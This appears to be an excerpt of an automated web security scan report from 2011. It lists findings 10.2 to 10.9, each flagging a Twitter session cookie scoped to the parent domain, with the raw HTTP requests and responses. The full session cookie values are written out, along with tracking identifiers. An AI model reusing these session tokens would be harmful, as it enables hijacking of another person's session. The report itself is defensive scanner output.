Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 6331
Connection: close

[{"id_str":"12649013418","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"e3e4e2","protected":false,"id_str":"21457289","notifications":null,"profile_background_til
...[SNIP]...

10.2. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=FrankGruber&count=9&callback=jsonp1315055747616 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055711-7665-16121
X-RateLimit-Limit: 150
ETag: "49cc5068c90057edef228205e1476288"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:11 GMT
X-RateLimit-Remaining: 42
X-Runtime: 0.04128
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c8c6573bf9320edb145379ebdb80a35520ad745e
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19248
Connection: close

jsonp1315055747616([{"id_str":"109817941297610752","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"262626","protected":false,"id_str":"820828","notifications":null
...[SNIP]...

10.3. http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/MSFTResearch.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/MSFTResearch.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.9466070765629411 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:10:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055445-71261-45206
X-RateLimit-Limit: 150
ETag: "aca9628d4a3fc4347dcea521d1a5dc51"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:10:45 GMT
X-RateLimit-Remaining: 80
X-Runtime: 0.05589
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c60411d9469e43c5b4c2ea13d48be94ea96dc19b
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 40168
Connection: close

twitterCallback1([{"id_str":"108992350654693376","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"e3e4e2","protected":false,"id_str":"21457289","default_profile":fa
...[SNIP]...

10.4. http://api.twitter.com/1/statuses/user_timeline/SharePoint.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/SharePoint.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/SharePoint.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.07148340088315308 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:10:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055423-24298-25111
X-RateLimit-Limit: 150
ETag: "ba793ac022c58267c2b011c5d69d6fa8"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:10:23 GMT
X-RateLimit-Remaining: 114
X-Runtime: 0.06922
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 94000fb7a11d6cd186ccd2044a4f0420af8e80b6
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 39431
Connection: close

twitterCallback1([{"id_str":"109738122539040768","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"8a8f88","protected":false,"id_str":"26541422","notifications":fals
...[SNIP]...

10.5. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/msnewengland.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/msnewengland.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.09756158874370158 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Working/Jobs/tabid/145/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCCzwYy8yAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vbXNmdHJlc2VhcmNoIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ6DGNzcmZfaWQiJWI0ZDE4%250AYzBiMTIzNjFiMjllNjg3ODEwMzg0ZGM0Njdh--d45c6815ed8f43855aff674ef2335380c015147e

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:08:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055326-49454-28329
X-RateLimit-Limit: 150
ETag: "6e2a84db79cba3eb632f2bb0a5aa9bf0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:08:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02787
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 89b406751d38c59e2b9f4ed8f6d34c2fe2eddb34
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 72091
Connection: close

twitterCallback1([{"retweeted_status":{"id_str":"109776676589801472","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"C0DFEC","protected":false,"id_str":"259784927"
...[SNIP]...

10.6. http://api.twitter.com/1/trends/1.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/trends/1.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/trends/1.json?pc=false&personalized=false HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-14511-3550
X-RateLimit-Limit: 1000
ETag: "4ae65bcc6c25f8e92921d564b5f52cc0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 918
X-Runtime: 0.00951
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: max-age=300, must-revalidate
X-MID: a3b38fddc509eeacb27be351b79049caf50a7c6f
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwgs8GMvMgE6B2lk%250AIiVjMGY3NGNmOTcwMzg4MWM5NjQwODQ0Y2IyYjFkMGY3NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--3d57475cc03ae064aa02ac897973859ef1392693; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 1732
Connection: close

[{"as_of":"2011-09-03T13:11:07Z","locations":[{"woeid":1,"name":"Worldwide"}],"trends":[{"query":"%2310CancionesQueNoVoyOlvidar","name":"#10CancionesQueNoVoyOlvidar","url":"http:\/\/twitter.com\/searc
...[SNIP]...

10.7. http://api.twitter.com/1/trends/available.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/trends/available.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/trends/available.json?lang=en HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-11220-58142
X-RateLimit-Limit: 1000
ETag: "f827a919eae7f84ffa87a2017bfa70a7"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 924
X-Runtime: 0.09612
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: max-age=2592000, must-revalidate
X-MID: f35ebe7707e2a60c095bd4a08d8619b5927749e4
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 21317
Connection: close

[{"woeid":23424969,"name":"Turkey","parentid":1,"url":"http:\/\/where.yahooapis.com\/v1\/place\/23424969","placeType":{"name":"Country","code":12},"countryCode":"TR","country":"Turkey"},{"woeid":23645
...[SNIP]...

10.8. http://api.twitter.com/1/urls/resolve.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/urls/resolve.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Ft.co%2FDZbwq2r&urls%5B%5D=http%3A%2F%2Ft.co%2FBvjrJND&urls%5B%5D=http%3A%2F%2Ft.co%2FNXvo96p&urls%5B%5D=http%3A%2F%2Ft.co%2FJEK0Uwt&urls%5B%5D=http%3A%2F%2Ft.co%2Frmivlz6&urls%5B%5D=http%3A%2F%2Ft.co%2FLCS6x0L HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCCzwYy8yAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vbXNmdHJlc2VhcmNoOgdpZCIlYzBmNzRjZjk3MDM4ODFj%250AOTY0MDg0NGNiMmIxZDBmNzQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6DGNzcmZfaWQiJWI0ZDE4%250AYzBiMTIzNjFiMjllNjg3ODEwMzg0ZGM0Njdh--a4167d343994f3345ca9273ae21febed2a6a18bb

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055703-76483-6679
X-RateLimit-Limit: 1000
ETag: "1cd5ae66a39669107f466e34aeb2db0a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:03 GMT
X-RateLimit-Remaining: 838
X-Runtime: 0.00848
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 20bbd750b9efae64a1a49d6f2193f5447800ef9d
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 731
Connection: close

{"http:\/\/t.co\/BvjrJND":"http:\/\/frankgruber.me\/post\/9683723109\/were-underway-at-the-techcocktail-boston-summer\/","http:\/\/t.co\/NXvo96p":"https:\/\/foursquare.com\/alwillis\/checkin\/4e6010b8
...[SNIP]...

10.9. http://api.twitter.com/1/users/search.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/users/search.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/users/search.json?reputable=true&display_location=search-component&pc=true&q=%23TechCocktailBOS HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
